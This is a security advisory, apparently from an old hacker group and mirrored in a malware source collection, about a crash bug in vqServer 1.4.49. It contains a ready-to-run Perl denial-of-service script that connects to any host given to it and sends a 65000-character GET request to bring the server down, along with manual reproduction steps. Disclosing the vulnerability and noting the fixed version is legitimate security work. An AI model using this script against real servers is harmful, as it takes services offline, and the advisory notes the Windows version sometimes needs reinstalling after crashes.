mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
71 lines
2.2 KiB
Plaintext
71 lines
2.2 KiB
Plaintext
DHC Advisory
|
|
Advisory for vqServer 1.4.49
|
|
vqServer is made by vqSoft. Site: http://www.vqsoft.com
|
|
by nemesystm of the DHC
|
|
(http://dhcorp.cjb.net - auto45040@hushmail.com)
|
|
|
|
/-|=[explaination]=|-\
|
|
When sending vqServer version 1.4.49 a malformed URL request it will crash
|
|
the service. This has been verified to work on the Windows version, but
|
|
it probably is in the linux/unix version and prior versions too.
|
|
|
|
/-|=[testing it]=|-\
|
|
To test this vulnerability, send a GET request with 65000 characters.
|
|
So:
|
|
GET /AAA (hit return =)
|
|
Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste
|
|
that much characters in their browser fields (www.server.com/AAA) you will
|
|
have to use something like Telnet.
|
|
You can easily program something to print 65000 chars in Perl:
|
|
open (OUT, ">$ARGV[0]");
|
|
print OUT ("GET /");
|
|
print OUT ("A" x 65000);
|
|
then it's just a cut and paste.
|
|
Or you can use the example code below
|
|
|
|
/-|=[fix]=|-\
|
|
the latest edition of vqServer (1.9.47) is unaffected by this. It is available
|
|
for download at www.vqsoft.com
|
|
|
|
/-|=[notes]=|-\
|
|
PUT, POST and the Administration port do not seem to be affected by a high
|
|
amount of characters. The Windows version needed a reinstall every five
|
|
or so crashes. A reboot or total shutdown did not help.
|
|
|
|
/-|=[exploit code]=|-\
|
|
sinfony quickly wrote some code so you can see if you're vulnerable.
|
|
|
|
# DoS exploit for vqServer 1.4.49
|
|
# This vulnerability was discovered by nemesystm
|
|
# (auto45040@hushmail.com)
|
|
#
|
|
# code by: sinfony (chinesef00d@hotmail.com)
|
|
# [confess.sins.labs] (http://www.ro0t.nu/csl)
|
|
# and DHC member
|
|
#
|
|
# kiddie quote of the year:
|
|
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it
|
|
|
|
die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n
|
|
usage: $0 <host> \n"
|
|
if $#ARGV != 0;
|
|
|
|
use IO::Socket;
|
|
|
|
$host = $ARGV[0];
|
|
$port = 80;
|
|
|
|
print "Connecting to $host on port $port...\n";
|
|
$suck = IO::Socket::INET->
|
|
new(Proto=>"tcp",
|
|
PeerAddr=>$host,
|
|
PeerPort=>$port)
|
|
|| die "$host isnt a webserver you schmuck.\n";
|
|
|
|
$a = A;
|
|
$send = $a x 65000;
|
|
print "Connected, sending exploit.\n";
|
|
print $suck "GET /$send\n";
|
|
sleep(3);
|
|
print "Exploit sent. vqServer should be dead.\n";
|
|
close($suck) |